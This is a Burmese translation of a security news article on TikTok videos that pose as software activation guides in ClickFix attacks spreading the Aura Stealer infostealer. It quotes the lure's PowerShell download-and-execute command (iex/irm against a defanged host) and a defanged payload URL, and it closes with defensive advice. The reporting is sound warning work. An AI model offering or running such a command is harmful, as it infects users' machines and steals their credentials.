ClickFix တိုက်ခိုက်မှုများတွင် Tiktok ဗီဒီယိုများမှတစ်ဆင့် အချက်အလက်ခိုးယူသည့် ဆော့ဖ်ဝဲလ်များ (infostealers) များအား ဖြန့်ဝေလျက်ရှိ

      ဆိုက်ဘာရာဇဝတ်မှုကျူးလွန်သူများသည် အချက်အလက်ခိုးယူသည့် အဖျက်အမှောင့် ဆော့ဖ်ဝဲလ်ပျံ့နှံ့စေရန်အတွက် Windows၊ Spotify နှင့် Netflix ကဲ့သို့သော နာမည်ကြီး ဆော့ဖ်ဝဲလ်များအား  အခမဲ့ Activation ပြုလုပ်သည့် လမ်းညွှန်များအဖြစ် အယောင်ဆောင်ထား သော TikTok ဗီဒီယိုများကို အသုံးပြုလျက်ရှိသည်။ BleepingComputer မှတွေ့ရှိသော TikTok ဗီဒီယိုများတွင် တရားဝင် Product များဖြစ်သည့် Windows၊ Microsoft 365၊ Adobe Premiere၊ Photoshop၊ CapCut Pro၊ Discord Nitro အပြင် ဝန်ဆောင်မှုပေးလျက်ရှိသော Netflix နှင့် Spotify Premium အစရှိသည်တို့တွင် activate ပြုလုပ်နည်း၊ လမ်းညွှန်ချက်များပုံစံ အယောင် ဆောင်ထားသည်။

         ဗီဒီယိုများသည် တရား၀င် ပြင်ဆင်သည့်နည်းလမ်းများ သို့မဟုတ် လမ်းညွှန်ချက်များ ဟန်ဆောင် ကာ Social Engineering Attack ဖြစ်သည့် ClickFix တိုက်ခိုက်မှုများကို လုပ်ဆောင်နေပြီး သုံးစွဲသူများအား အန္တရာယ်ရှိသော PowerShell Command များ သို့မဟုတ် ၎င်းတို့၏ ကွန်ပျူတာများကို Malware ကူးစက်စေသည့် အခြားသော Script များကို အလုပ်လုပ်စေမည် ဖြစ်သည်။

           ဗီဒီယိုတစ်ခုချင်းစီသည် အောက်ပါ command အတိုတစ်ကြောင်းကိုပြပြီး ကြည့်ရှုသူများအား Powershell တွင် Administrator အဖြစ် Run စေမည်ဖြစ်သည်။

            iex (irm slmgr[.]win/photoshop)

          အယောင်ဆောင်ထားသည့် Program အပေါ် မူတည်၍ URL ရှိ Program နာမည်သည် ကွဲပြားကြောင်း သတိပြုသင့်သည်။ ဥပမာအားဖြင့် Windows Activation ပြုလုပ်သည့် ဗီဒီယိုအတုအယောင်များတွင် Photoshop စကားလုံးပါသည့် url အစား  windows စကားလုံးပါ၀င်မည်ဖြစ်သည်။

         ဤကမ်ပိန်းတွင် Command ကို အလုပ်လုပ်စေသည့်အခါ PowerShell သည် Remote Site ဖြစ်သည့် slmgr[.]win သို့ ချိတ်ဆက်ပြီး အခြား PowerShell Script ကို ပြန်လည်ရယူ၍ အလုပ်လုပ်စေမည်ဖြစ်သည်။

              ၎င်း script သည် Cloudflare စာမျက်နှာများမှ အလုပ်လုပ်စေနိုင်သော ဖိုင်နှစ်ခုကို download ပြုလုပ်မည်ဖြစ်ပြီး ပထမဖိုင်သည် https://file-epq[.]pages[.]dev/updater.exe [VirusTotal] ဖြစ်ပြီး ၎င်းသည် သတင်းအချက်အလက်ခိုးယူသည့် Aura Stealer malware ၏ မူကွဲတစ်ခုဖြစ်သည်။

              Aura Stealer များသည် Browser များ၊ အထောက်အထားစိစစ်သော Cookie များ၊ Cryptocurrency Wallet များနှင့် အခြား Application များမှ Credential များကို စုဆောင်းပြီး တိုက်ခိုက်သူများထံ ပေးပို့ကာ မိမိအကောင့်များအား  မသမာသူမှ ဝင်ရောက်ရယူသုံးစွဲခွင့် ရအောင် လုပ်ဆောင်နိုင်သည်။

           .NET တွင် တစ်ပါတည်းထည့်သွင်းထားသော Visual C# Compiler (csc.exe) ကို အသုံးပြု၍ မိမိဘာသာ အလုပ်လုပ်စေနိုင်သောကုဒ်ပါဝင်သည့် source.exe [VirusTotal] ဖိုင်ကို အပို Payload တစ်ခုအဖြစ် Download ပြုလုပ်မည်ဖြစ်သည်။ ထို့နောက် memory ထဲတွင် ဤကုဒ်ကို စတင်အလုပ်လုပ်စေမည်ဖြစ်သည်။

              အပို Payload ၏ အလုပ်လုပ်ပုံကိုတော့ ရှင်းလင်းစွာ မသိရပါ။

          ဖော်ပြပါအဆင့်များကို လုပ်ဆောင်ခဲ့သော User များသည် ၎င်းတို့၏ Credential အားလုံးကို ပေါက်ကြားစေခဲ့ပြီဖြစ်ရာ မိမိတို့ ဝင်ကြည့်ခဲ့သည့် ဆိုက်များအားလုံး၏ စကားဝှက်များကို ချက်ချင်း ပြန်လည် Reset လုပ်ရန် လိုအပ်ပါသည်။

           လွန်ခဲ့သည့်နှစ်များအတွင်း ClickFix တိုက်ခိုက်မှုများသည် Ransomware နှင့် Cryptocurrency ခိုးယူမှုဆိုင်ရာ ကမ်ပိန်းများတွင် Malware အမျိုးမျိုး ဖြန့်ဝေရာတွင်   အလွန်ခေတ်စားလာခဲ့ သည်။

      ယေဘုယျစည်းမျဉ်းအနေဖြင့် အသုံးပြုသူများသည် ဝဘ်ဆိုက်တစ်ခုမှ စာသားကို ကူးယူပြီး File Explorer Address Bar ၊ Command Prompt၊ PowerShell Prompts၊ macOS Terminal နှင့် Linux shellများအပါအဝင် Operating System Dialogue Box တွင် Run ခြင်းများ မပြုလုပ်သင့်ပါ။

Reference: bleepingcomputer.com ၏ TikTok videos continue to push infostealers in ClickFix attacks သတင်းဆောင်းပါကို ဆီလျော်အောင် ဘာသာပြန်သည်။